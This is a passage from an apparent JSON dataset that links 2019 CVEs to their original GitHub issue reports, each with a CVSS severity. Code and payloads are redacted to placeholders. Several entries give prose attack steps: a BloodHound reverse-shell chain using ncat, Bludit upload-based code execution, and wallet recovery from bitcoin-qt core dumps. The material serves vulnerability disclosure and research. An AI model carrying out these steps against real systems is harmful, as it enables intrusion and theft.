  38276. "Issue_Url_old": "https://github.com/wolfSSL/wolfssl/issues/2421",
  38277. "Issue_Url_new": "https://github.com/wolfssl/wolfssl/issues/2421",
  38278. "Repo_new": "wolfssl/wolfssl",
  38279. "Issue_Created_At": "2019-08-21T09:02:59Z",
  38280. "description": "one byte heap overread ( PATHTAG ). tested on APITAG NUMBERTAG ubuntu NUMBERTAG clang / asan Hi, I've come upon a one byte heap overread bug due to corner case mishandling in APITAG PATHTAG ), you could trigger it by loading the attached DER certificate using API APITAG (or FILETAG ( FILETAG Corner cases: CODETAG If idx + length == APITAG which passed the check, it will trigger a buffer over read in ( PATHTAG ) CODETAG ASAN report ERRORTAG",
  38281. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38282. "severity": "CRITICAL",
  38283. "baseScore": 9.8,
  38284. "impactScore": 5.9,
  38285. "exploitabilityScore": 3.9
  38286. },
  38287. {
  38288. "CVE_ID": "CVE-2019-15698",
  38289. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5810",
  38290. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5810",
  38291. "Repo_new": "octopusdeploy/issues",
  38292. "Issue_Created_At": "2019-08-27T06:16:15Z",
  38293. "description": "Sensitive values may be exposed in some circumstances via variable preview. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description In certain circumstances, an authenticated user with APITAG permissions could view sensitive values via the improved variable preview shipped in APITAG Introduced in URLTAG Affected versions Octopus Server APITAG APITAG Mitigation Nothing great. Workarounds Upgrade to Octopus APITAG Limit users with APITAG permission Ensure all variables that reference a secure variable are themselves marked as sensitive Use subscriptions to track modifications to variables to audit access. Links Source: internally reported.",
  38294. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  38295. "severity": "MEDIUM",
  38296. "baseScore": 4.3,
  38297. "impactScore": 1.4,
  38298. "exploitabilityScore": 2.8
  38299. },
  38300. {
  38301. "CVE_ID": "CVE-2019-15701",
  38302. "Issue_Url_old": "https://github.com/BloodHoundAD/BloodHound/issues/267",
  38303. "Issue_Url_new": "https://github.com/bloodhoundad/bloodhound/issues/267",
  38304. "Repo_new": "bloodhoundad/bloodhound",
  38305. "Issue_Created_At": "2019-08-25T02:48:07Z",
  38306. "description": "Code execution in Bloodhound via malicious AD Object. Dear Bloodhound Team \u2013 I identified a way to achieve code execution in Bloodhound by creating a GPO with a name containing APITAG code that will trigger in Bloodhound's search autocomplete function. The injected APITAG is not only a valid xss but also allows the creation of a child process. The following steps are required to reproduce the vulnerability with a simple reverse shell using ncat NUMBERTAG Create a GPO with the following name: APITAG NUMBERTAG Run Sharphound APITAG NUMBERTAG Import collected data NUMBERTAG Host the following js payload as FILETAG (all uppercase is important here since the sharphound output json always has the value for the name field in upper case) APITAG APITAG e.g. with APITAG NUMBERTAG Start listener APITAG NUMBERTAG Search for \"aa\" in Bloodhound and catch the shell I suppose there is still a lot of room for improving the actual exploit. Probably there are better strings to make it trigger on than \"aaaaa\" and I also would not consider APITAG as one of my strengths but I hope I could prove my point here :) I also made a video APITAG Bloodhound APITAG URLTAG",
  38307. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  38308. "severity": "HIGH",
  38309. "baseScore": 8.8,
  38310. "impactScore": 5.9,
  38311. "exploitabilityScore": 2.8
  38312. },
  38313. {
  38314. "CVE_ID": "CVE-2019-15702",
  38315. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/12086",
  38316. "Issue_Url_new": "https://github.com/riot-os/riot/issues/12086",
  38317. "Repo_new": "riot-os/riot",
  38318. "Issue_Created_At": "2019-08-26T15:10:23Z",
  38319. "description": "gnrc_tcp: option parsing doesn't terminate on all inputs, potential DOS. Description The APITAG parser for TCP options ( APITAG ) doesn't terminate on all inputs. When sending a packet with an unknown option and option length zero it doesn't advance the option pointer (i.e. advances it by zero) and therefore stays in the loop forever. Steps to reproduce the issue NUMBERTAG Configure the interface tap as follows APITAG NUMBERTAG Enable debug in APITAG NUMBERTAG Compile APITAG using: APITAG NUMBERTAG Start APITAG using: APITAG NUMBERTAG Invoke the following python script (requires scapy): CODETAG For example using APITAG Expected results The application should parse the unknown option once. Actual results The application parses the unknown option an infinite amount of times. Example output: ERRORTAG Impact Denial of service, possibly allowing battery drain, et cetera.",
  38320. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38321. "severity": "HIGH",
  38322. "baseScore": 7.5,
  38323. "impactScore": 3.6,
  38324. "exploitabilityScore": 3.9
  38325. },
  38326. {
  38327. "CVE_ID": "CVE-2019-15714",
  38328. "Issue_Url_old": "https://github.com/entropic-dev/entropic/issues/251",
  38329. "Issue_Url_new": "https://github.com/entropic-dev/entropic/issues/251",
  38330. "Repo_new": "entropic-dev/entropic",
  38331. "Issue_Created_At": "2019-06-11T13:00:16Z",
  38332. "description": "possible parent path traversal in command argument. Is this a feature request or a bug? bug Parent path traversal URLTAG is often considered a security problem. This is likely low impact if it is a security problem; the only vectors I can see is socially engineered copy/paste or postinstall hook abuse. If an attacker can get a JS file onto the machine, they might be able to use shell injection or malicious hooks to cause entropic to load that JS file, but an attacker can usually do anything via shell access that they could by running JS in the entropic process unless entropic evolved to accept multiple commands as a long lived, privileged process. Actual behavior: URLTAG APITAG fails with an error like ERRORTAG ... is not a function\" This works because APITAG backs out of APITAG to the root directory for entropic. Expected behavior: A command passed as the zero th argument at the command line should not cause line NUMBERTAG to load a package outside the commands subdirectory. Line NUMBERTAG should not load a dev dependency or a globally installed non dependency. Specifically, APITAG should dump help info instead of potentially calling prettier's export as an async function. Steps to replicate: APITAG Possible fix One way to address is to define a ERRORTAG that uses APITAG to convert APITAG to a file path, then use APITAG to find a path relative to __DIRNAME and see if the first component of that relative path is commands . Alternatively, if there is no desire to support commands like APITAG in the future then main could dump help text when APITAG . I can put together a PR if desired.",
  38333. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  38334. "severity": "MEDIUM",
  38335. "baseScore": 5.3,
  38336. "impactScore": 1.4,
  38337. "exploitabilityScore": 3.9
  38338. },
  38339. {
  38340. "CVE_ID": "CVE-2019-15716",
  38341. "Issue_Url_old": "https://github.com/wtfutil/wtf/issues/517",
  38342. "Issue_Url_new": "https://github.com/wtfutil/wtf/issues/517",
  38343. "Repo_new": "wtfutil/wtf",
  38344. "Issue_Created_At": "2019-07-24T16:02:21Z",
  38345. "description": "Security: open call for thoughts on securing WTF's config file. WTF's APITAG file is a plain text file stored in the user's home directory. Given the nature of many of the modules in WTF, that file could hold account information, passwords, URIs, and API keys for the user's critical systems. This issue is a place to discuss the security of that file NUMBERTAG Does it need to be secured? Should we just trust the machine instead NUMBERTAG If it should, how so? What's least friction for the user?",
  38346. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  38347. "severity": "MEDIUM",
  38348. "baseScore": 5.5,
  38349. "impactScore": 3.6,
  38350. "exploitabilityScore": 1.8
  38351. },
  38352. {
  38353. "CVE_ID": "CVE-2019-15758",
  38354. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/2288",
  38355. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/2288",
  38356. "Repo_new": "webassembly/binaryen",
  38357. "Issue_Created_At": "2019-08-07T21:48:28Z",
  38358. "description": "Crash and Assertion failed in wasm2js. Hi, I observed two crashes and an assertion failure in wasm2js (based on commit APITAG The poc files are attached. How to reproduce: APITAG FILETAG Report of backtrace in gdb Assertion failed ERRORTAG Crash ERRORTAG",
  38359. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38360. "severity": "MEDIUM",
  38361. "baseScore": 6.5,
  38362. "impactScore": 3.6,
  38363. "exploitabilityScore": 2.8
  38364. },
  38365. {
  38366. "CVE_ID": "CVE-2019-15811",
  38367. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/108",
  38368. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/108",
  38369. "Repo_new": "domainmod/domainmod",
  38370. "Issue_Created_At": "2019-08-28T21:27:49Z",
  38371. "description": "XSS: The parameter 'daterange' is not being sanitized correctly.. Hello, There is a Cross Site Scripting vulnerability in the file APITAG in the parameter daterange . APITAG of Concept:__ URLTAG Kind Regards, APITAG",
  38372. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38373. "severity": "MEDIUM",
  38374. "baseScore": 6.1,
  38375. "impactScore": 2.7,
  38376. "exploitabilityScore": 2.8
  38377. },
  38378. {
  38379. "CVE_ID": "CVE-2019-15903",
  38380. "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/317",
  38381. "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/317",
  38382. "Repo_new": "libexpat/libexpat",
  38383. "Issue_Created_At": "2019-08-26T03:09:37Z",
  38384. "description": "Heap overflow in APITAG Hello, Heap overflow found when I call below apis with a crafted input value. parser = APITAG APITAG APITAG if APITAG input, (int)strlen(input), XML_TRUE) != XML_STATUS_SUSPENDED) { fprintf(stderr, \"%d\", APITAG } Attached file has both a source code to replay this bug and the bug report of address sanitizer. This bug found R NUMBERTAG R NUMBERTAG I used following commands to build libexpat and build the source code for replaying the bug. FILETAG",
  38385. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38386. "severity": "HIGH",
  38387. "baseScore": 7.5,
  38388. "impactScore": 3.6,
  38389. "exploitabilityScore": 3.9
  38390. },
  38391. {
  38392. "CVE_ID": "CVE-2019-15903",
  38393. "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/342",
  38394. "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/342",
  38395. "Repo_new": "libexpat/libexpat",
  38396. "Issue_Created_At": "2019-09-08T18:11:07Z",
  38397. "description": "Release Expat NUMBERTAG Regular releases: ] Bump APITAG version info, document in change log [ ] make distcheck source tarballs using APITAG [ ] Build and test Windows installer APITAG [ ] APITAG [ ] Upload Windows installer [ ] Upload source tarballs + APITAG GPG signature NUMBERTAG Make one new source tarball default download for all but Windows [ ] Make new installer binary default download for Windows [ ] APITAG [ ] APITAG signed Git tag URLTAG and push it [ ] Upload source tarball + APITAG GPG signature NUMBERTAG Upload Windows installer APITAG [ ] Let the community know: [ ] News item on FILETAG [ ] Mail Expat distro maintainers directly [ ] Write to the xml dev mailing list \u2014 TODO [ ] Blog about it at APITAG \u2014 TODO [ ] Submit to Hacker News \u2014 TODO [ ] Blog about it at APITAG \u2014 TODO [ ] APITAG ebuild in Gentoo) Specific to NUMBERTAG Request CVE for NUMBERTAG CVETAG [x] Add CVE to change log [ ] Open security bug in Gentoo \u2014 TODO",
  38398. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38399. "severity": "HIGH",
  38400. "baseScore": 7.5,
  38401. "impactScore": 3.6,
  38402. "exploitabilityScore": 3.9
  38403. },
  38404. {
  38405. "CVE_ID": "CVE-2019-15947",
  38406. "Issue_Url_old": "https://github.com/bitcoin/bitcoin/issues/16824",
  38407. "Issue_Url_new": "https://github.com/bitcoin/bitcoin/issues/16824",
  38408. "Repo_new": "bitcoin/bitcoin",
  38409. "Issue_Created_At": "2019-09-07T17:24:59Z",
  38410. "description": "Crash dumps from bitcoin qt contain wallets. On a crash, bitcoin qt may dump a core file that contains what was in memory at the time of the crash, for debugging purposes. The problem here is that bitcoin qt stores the user's wallet.dat unencrypted in memory. With this information it becomes rather trivial to reconstruct parts of a user's wallet.dat from a .core dump alone. You can find the wallets within the core file simply by grepping for known parts of a wallet.dat ex: APITAG With this information you can find the offset of the wallet within the core file, and reconstruct it per a known APITAG length. Upon reloading the extracted wallet into bitcoin qt, you'll lose address book information but balance is retained. This has been assigned CVETAG . URLTAG CVETAG",
  38411. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  38412. "severity": "HIGH",
  38413. "baseScore": 7.5,
  38414. "impactScore": 3.6,
  38415. "exploitabilityScore": 3.9
  38416. },
  38417. {
  38418. "CVE_ID": "CVE-2019-16060",
  38419. "Issue_Url_old": "https://github.com/airbrake/airbrake-ruby/issues/468",
  38420. "Issue_Url_new": "https://github.com/airbrake/airbrake-ruby/issues/468",
  38421. "Repo_new": "airbrake/airbrake-ruby",
  38422. "Issue_Created_At": "2019-04-09T18:07:23Z",
  38423. "description": "blacklist_keys not being filtered out in version NUMBERTAG airbrake ruby version NUMBERTAG airbrake version NUMBERTAG also saw this issue with NUMBERTAG Ruby version NUMBERTAG Framework name & version: Rails NUMBERTAG Airbrake config CODETAG Description The APITAG are no longer being filtered out of the parameters. I can test this way from the console: ERRORTAG On airbrake ruby version NUMBERTAG the parameters show up as: APITAG On version NUMBERTAG of the gem, that filtering doesn't happen: APITAG I was able to get blacklist filtering to work again by adding this to the initializer, right after the APITAG block: APITAG",
  38424. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38425. "severity": "CRITICAL",
  38426. "baseScore": 9.8,
  38427. "impactScore": 5.9,
  38428. "exploitabilityScore": 3.9
  38429. },
  38430. {
  38431. "CVE_ID": "CVE-2019-16096",
  38432. "Issue_Url_old": "https://github.com/antirez/kilo/issues/60",
  38433. "Issue_Url_new": "https://github.com/antirez/kilo/issues/60",
  38434. "Repo_new": "antirez/kilo",
  38435. "Issue_Created_At": "2019-08-27T02:04:47Z",
  38436. "description": "Integer Overflow && heap buffer overflow in kilo.c. There is a heap overflow caused by integer overflow in kilo.c. POC: APITAG In command line: APITAG Output: ERRORTAG Analyze: There is an integer overflow in function APITAG CODETAG The space size being malloc'd is calculated based on the number of TABs in one row. When the number of TABs is too big, it will lead to an integer overflow. And it will finally lead to a heap buffer overflow.",
  38437. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38438. "severity": "HIGH",
  38439. "baseScore": 7.5,
  38440. "impactScore": 3.6,
  38441. "exploitabilityScore": 3.9
  38442. },
  38443. {
  38444. "CVE_ID": "CVE-2019-16109",
  38445. "Issue_Url_old": "https://github.com/plataformatec/devise/issues/5071",
  38446. "Issue_Url_new": "https://github.com/heartcombo/devise/issues/5071",
  38447. "Repo_new": "heartcombo/devise",
  38448. "Issue_Created_At": "2019-05-04T00:12:11Z",
  38449. "description": "Confirmable should generate a token if confirmation_token is currently an empty string. Environment Ruby NUMBERTAG p NUMBERTAG Rails NUMBERTAG Devise NUMBERTAG Current behavior Currently, when using the confirmable module, devise only checks if the APITAG field is not nil. If it's nil, it will generate a confirmation token for you; if it's not, it won't. However, it can be set to an empty string, which should not be allowed, as it presents a security issue, allowing someone passing an empty string as the confirmation token to sign in as the person with the blank string confirmation token. This is the offending code: URLTAG Expected behavior Devise should do something like APITAG , which checks for nil and blank.",
  38450. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  38451. "severity": "MEDIUM",
  38452. "baseScore": 5.3,
  38453. "impactScore": 1.4,
  38454. "exploitabilityScore": 3.9
  38455. },
  38456. {
  38457. "CVE_ID": "CVE-2019-16113",
  38458. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1081",
  38459. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1081",
  38460. "Repo_new": "bludit/bludit",
  38461. "Issue_Created_At": "2019-09-07T11:40:38Z",
  38462. "description": "Bludit NUMBERTAG Code Execution Vulnerability in APITAG function\" . A code execution vulnerability in Bludit NUMBERTAG Hi, I am opening a new issue for the CVE ID; sorry about APITAG I think you haven't completely fixed the bug. There is a new code execution vulnerability which allows an attacker to get server permissions; the path is PATHTAG NUMBERTAG Log in with any account that allows you to edit content FILETAG NUMBERTAG Upload the malicious jpg. We can control the location of the uploaded file by changing the value of the uuid, then upload the malicious picture to the tmp folder FILETAG FILETAG NUMBERTAG Upload both the APITAG file and the target jpg FILETAG FILETAG FILETAG Successfully reverted to the target file NUMBERTAG Access the malicious file that was written through the jpg FILETAG So I recommend validating the file before uploading it to the temporary directory",
  38463. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  38464. "severity": "HIGH",
  38465. "baseScore": 8.8,
  38466. "impactScore": 5.9,
  38467. "exploitabilityScore": 2.8
  38468. },
  38469. {
  38470. "CVE_ID": "CVE-2019-16126",
  38471. "Issue_Url_old": "https://github.com/getgrav/grav/issues/2657",
  38472. "Issue_Url_new": "https://github.com/getgrav/grav/issues/2657",
  38473. "Repo_new": "getgrav/grav",
  38474. "Issue_Created_At": "2019-08-31T12:29:53Z",
  38475. "description": "XSS: Stored XSS due to Javascript execution in SVG files. Hello, I found that when uploading a new avatar, you can upload a SVG file, which can contain Javascript (which gets executed upon visit). I've attached a SVG file which can be used to reproduce the issue. If more information is needed, I can provide that. Kind regards, MENTIONTAG FILETAG",
  38476. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38477. "severity": "MEDIUM",
  38478. "baseScore": 6.1,
  38479. "impactScore": 2.7,
  38480. "exploitabilityScore": 2.8
  38481. },
  38482. {
  38483. "CVE_ID": "CVE-2019-16130",
  38484. "Issue_Url_old": "https://github.com/weison-tech/yii2-cms/issues/2",
  38485. "Issue_Url_new": "https://github.com/weison-tech/yii2-cms/issues/2",
  38486. "Repo_new": "weison-tech/yii2-cms",
  38487. "Issue_Created_At": "2019-08-31T14:28:50Z",
  38488. "description": "yii2 cms\u5b58\u5728\u5b58\u50a8\u578bXSS. \u5728\u524d\u7aef\u7684\u7559\u8a00\u5904\u672a\u8fc7\u6ee4\u8f93\u5165\u5185\u5bb9 \u6709\u6548\u8d1f\u8377\uff1a APITAG \u6587\u4ef6\u540d PATHTAG \u4ee3\u7801 ERRORTAG \u5229\u7528 \u6211\u4eec\u53d1\u73b0name\u6ca1\u6709\u9650\u5236\u8f93\u5165\u7684\u957f\u5ea6\uff0c\u5c1d\u8bd5\u6784\u9020\u6709\u6548\u8d1f\u8377 POC CODETAG \u7ed3\u679c \u6211\u4eec\u53bb\u540e\u53f0\u67e5\u770b FILETAG",
  38489. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38490. "severity": "MEDIUM",
  38491. "baseScore": 6.1,
  38492. "impactScore": 2.7,
  38493. "exploitabilityScore": 2.8
  38494. },
  38495. {
  38496. "CVE_ID": "CVE-2019-16139",
  38497. "Issue_Url_old": "https://github.com/llogiq/compact_arena/issues/22",
  38498. "Issue_Url_new": "https://github.com/llogiq/compact_arena/issues/22",
  38499. "Repo_new": "llogiq/compact_arena",
  38500. "Issue_Created_At": "2019-05-21T18:44:48Z",
  38501. "description": "Generativity mechanism is unsound \ud83d\udca5. (sorry; I only found this because I was trying to imitate your closure less generativity) CODETAG This successfully compiles and panics with ERRORTAG and segfaults when compiled in release mode with ERRORTAG APITAG",
  38502. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38503. "severity": "CRITICAL",
  38504. "baseScore": 9.8,
  38505. "impactScore": 5.9,
  38506. "exploitabilityScore": 3.9
  38507. },
  38508. {
  38509. "CVE_ID": "CVE-2019-16141",
  38510. "Issue_Url_old": "https://github.com/matklad/once_cell/issues/46",
  38511. "Issue_Url_new": "https://github.com/matklad/once_cell/issues/46",
  38512. "Repo_new": "matklad/once_cell",
  38513. "Issue_Created_At": "2019-09-01T16:23:01Z",
  38514. "description": "Lazy can cause UB when initialization fails, and program retries initialization. The following program causes UB: ERRORTAG This is because of incorrect use of ERRORTAG when Lazy structure is poisoned. ERRORTAG This should panic instead of causing unchecked UB.",
  38515. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38516. "severity": "HIGH",
  38517. "baseScore": 7.5,
  38518. "impactScore": 3.6,
  38519. "exploitabilityScore": 3.9
  38520. },
  38521. {
  38522. "CVE_ID": "CVE-2019-16144",
  38523. "Issue_Url_old": "https://github.com/Xudong-Huang/generator-rs/issues/9",
  38524. "Issue_Url_new": "https://github.com/xudong-huang/generator-rs/issues/9",
  38525. "Repo_new": "xudong-huang/generator-rs",
  38526. "Issue_Created_At": "2019-01-11T21:34:45Z",
  38527. "description": "APITAG is unsound. APITAG takes NUMBERTAG APITAG parameters, but the rest of the Scope API assumes that those raw pointers are valid. For example, the public APITAG method does the following: ERRORTAG Calling APITAG with invalid (null, misaligned or dangling) pointers is possible in safe Rust, and APITAG can also be called from safe Rust, therefore this API is unsound. Either APITAG should be marked ERRORTAG , or it should take APITAG instead of raw pointers, adding a lifetime parameter to Scope .",
  38528. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38529. "severity": "HIGH",
  38530. "baseScore": 7.5,
  38531. "impactScore": 3.6,
  38532. "exploitabilityScore": 3.9
  38533. },
  38534. {
  38535. "CVE_ID": "CVE-2019-16161",
  38536. "Issue_Url_old": "https://github.com/k-takata/Onigmo/issues/132",
  38537. "Issue_Url_new": "https://github.com/k-takata/onigmo/issues/132",
  38538. "Repo_new": "k-takata/onigmo",
  38539. "Issue_Created_At": "2019-07-27T23:59:01Z",
  38540. "description": "Memory corruption in APITAG When onig_new(ONIG_SYNTAX_PERL) fails with error code APITAG APITAG crashes due to an invalid memory access. Here is a POC based on sample/syntax.c ERRORTAG CODETAG I've confirmed that, after the onig_new(ONIG_SYNTAX_PERL ....) failure in APITAG einfo.enc points to an invalid address. APITAG then dereferences members of the invalid APITAG, which causes memory corruption. Here is a crash log. ONIGENC_MBC_TO_CODE(enc, p, end) in APITAG tries to call a NULL address (einfo.enc >mbc_to_code). ERRORTAG Thanks Ren",
  38541. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38542. "severity": "HIGH",
  38543. "baseScore": 7.5,
  38544. "impactScore": 3.6,
  38545. "exploitabilityScore": 3.9
  38546. },
  38547. {
  38548. "CVE_ID": "CVE-2019-16162",
  38549. "Issue_Url_old": "https://github.com/k-takata/Onigmo/issues/139",
  38550. "Issue_Url_new": "https://github.com/k-takata/onigmo/issues/139",
  38551. "Repo_new": "k-takata/onigmo",
  38552. "Issue_Created_At": "2019-07-31T00:45:06Z",
  38553. "description": "Out of bounds read in APITAG When Onigmo tries to parse a regular expression NUMBERTAG it causes an out of bounds read in APITAG Here is a POC based on sample/syntax.c ERRORTAG APITAG Here is a crash log. CODETAG Thanks",
  38554. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38555. "severity": "HIGH",
  38556. "baseScore": 7.5,
  38557. "impactScore": 3.6,
  38558. "exploitabilityScore": 3.9
  38559. },
  38560. {
  38561. "CVE_ID": "CVE-2019-16163",
  38562. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/147",
  38563. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/147",
  38564. "Repo_new": "kkos/oniguruma",
  38565. "Issue_Created_At": "2019-07-29T02:45:52Z",
  38566. "description": "Stack exhaustion problem caused by some parsing functions in regcomp.c making recursive calls to themselves. If Oniguruma tries to optimize very deeply nested regex nodes, it exhausts the stack (stack overflow) due to deep recursive calls to parsing functions like APITAG APITAG Here is a POC source that simply executes APITAG with a very large regular expression APITAG .... \". ERRORTAG APITAG ERRORTAG",
  38567. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38568. "severity": "HIGH",
  38569. "baseScore": 7.5,
  38570. "impactScore": 3.6,
  38571. "exploitabilityScore": 3.9
  38572. },
  38573. {
  38574. "CVE_ID": "CVE-2019-16164",
  38575. "Issue_Url_old": "https://github.com/lexborisov/myhtml/issues/175",
  38576. "Issue_Url_new": "https://github.com/lexborisov/myhtml/issues/175",
  38577. "Repo_new": "lexborisov/myhtml",
  38578. "Issue_Created_At": "2019-07-29T07:41:57Z",
  38579. "description": "NULL ptr dereference in tree node remove callback. POC HTML code is here URLTAG APITAG While parsing the above HTML code, myhtml tries to remove the \\ APITAG tag because the \\ APITAG tag is not closed correctly. \" APITAG tag NUMBERTAG b NUMBERTAG a NUMBERTAG e8) and causes a NULL ptr dereference at myhtml_node_tag_id( myhtml_node_parent(node) ); in APITAG CODETAG Here is a crash log. ERRORTAG",
  38580. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38581. "severity": "MEDIUM",
  38582. "baseScore": 6.5,
  38583. "impactScore": 3.6,
  38584. "exploitabilityScore": 2.8
  38585. },
  38586. {
  38587. "CVE_ID": "CVE-2019-16167",
  38588. "Issue_Url_old": "https://github.com/sysstat/sysstat/issues/230",
  38589. "Issue_Url_new": "https://github.com/sysstat/sysstat/issues/230",
  38590. "Repo_new": "sysstat/sysstat",
  38591. "Issue_Created_At": "2019-08-03T01:42:44Z",
  38592. "description": "Memory corruption bug due to integer overflow in APITAG If the sadf utility reads the following stat file, it causes memory corruption (SIGSEGV). FILETAG APITAG The crash happens in the following part of FILETAG . ERRORTAG If the stat file has a large file_magic >hdr_types_nr(ftypes_nr NUMBERTAG the calculation at ftypes_nr NUMBERTAG ULL_ALIGNMENT_WIDTH overflows, so it passes the size check above and then causes an OOB access at memset(((char ) ps) + ftypes_nr NUMBERTAG ULL_ALIGNMENT_WIDTH...) Here is a crash log. ERRORTAG Thanks",
  38593. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38594. "severity": "MEDIUM",
  38595. "baseScore": 5.5,
  38596. "impactScore": 3.6,
  38597. "exploitabilityScore": 1.8
  38598. },
  38599. {
  38600. "CVE_ID": "CVE-2019-16249",
  38601. "Issue_Url_old": "https://github.com/opencv/opencv/issues/15481",
  38602. "Issue_Url_new": "https://github.com/opencv/opencv/issues/15481",
  38603. "Repo_new": "opencv/opencv",
  38604. "Issue_Created_At": "2019-09-07T15:52:32Z",
  38605. "description": "APITAG Build type: Release APITAG version: APITAG OS: APITAG APITAG VCS version: APITAG I've compiled opencv with clang with ASAN enabled while fuzzing the opencv_test_video binary APITAG and APITAG ERRORTAG",
  38606. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  38607. "severity": "MEDIUM",
  38608. "baseScore": 5.3,
  38609. "impactScore": 1.4,
  38610. "exploitabilityScore": 3.9
  38611. },
  38612. {
  38613. "CVE_ID": "CVE-2019-16276",
  38614. "Issue_Url_old": "https://github.com/golang/go/issues/34540",
  38615. "Issue_Url_new": "https://github.com/golang/go/issues/34540",
  38616. "Repo_new": "golang/go",
  38617. "Issue_Created_At": "2019-09-25T21:40:44Z",
  38618. "description": "net/http: invalid headers are normalized, allowing request smuggling. net/http (through net/textproto) used to accept and normalize invalid HTTP NUMBERTAG headers with a space before the colon, in violation of RFC NUMBERTAG If a Go server is used behind a reverse proxy that accepts and forwards but doesn't normalize such invalid headers, the reverse proxy and the server can interpret the headers differently. This can lead to filter bypasses or request smuggling, the latter if requests from separate clients are multiplexed onto the same connection by the proxy. Such invalid headers are now rejected by Go servers, and passed without normalization to Go client applications. This issue is CVETAG and is fixed in Go NUMBERTAG and Go NUMBERTAG",
  38619. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  38620. "severity": "HIGH",
  38621. "baseScore": 7.5,
  38622. "impactScore": 3.6,
  38623. "exploitabilityScore": 3.9
  38624. },
  38625. {
  38626. "CVE_ID": "CVE-2019-16303",
  38627. "Issue_Url_old": "https://github.com/jhipster/jhipster-kotlin/issues/183",
  38628. "Issue_Url_new": "https://github.com/jhipster/jhipster-kotlin/issues/183",
  38629. "Repo_new": "jhipster/jhipster-kotlin",
  38630. "Issue_Created_At": "2019-09-13T22:27:51Z",
  38631. "description": "FILETAG APITAG is using an insecure source of randomness to generate all of its random values. APITAG relies upon apache commons lang3 APITAG . From the documentation: > Caveat: Instances of Random, upon which the implementation of this class relies, are not cryptographically secure. > \\ FILETAG Here are the examples of APITAG Kotlin's use of an insecure PRNG: URLTAG Proof of concepts already exist: there has been a public POC since March NUMBERTAG rd NUMBERTAG of taking one RNG value generated by APITAG and reversing it to recover all of the past/future RNG values. URLTAG POC Repository: URLTAG Potential Impact (Technical): All that is required is to obtain one password reset token from a APITAG generated service; using the POC above, you can predict every future password reset token this server will generate. This allows an attacker to pick and choose which account they would like to take over by sending password reset requests for the targeted accounts.",
  38632. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38633. "severity": "CRITICAL",
  38634. "baseScore": 9.8,
  38635. "impactScore": 5.9,
  38636. "exploitabilityScore": 3.9
  38637. },
  38638. {
  38639. "CVE_ID": "CVE-2019-16303",
  38640. "Issue_Url_old": "https://github.com/jhipster/generator-jhipster/issues/10401",
  38641. "Issue_Url_new": "https://github.com/jhipster/generator-jhipster/issues/10401",
  38642. "Repo_new": "jhipster/generator-jhipster",
  38643. "Issue_Created_At": "2019-09-13T07:57:12Z",
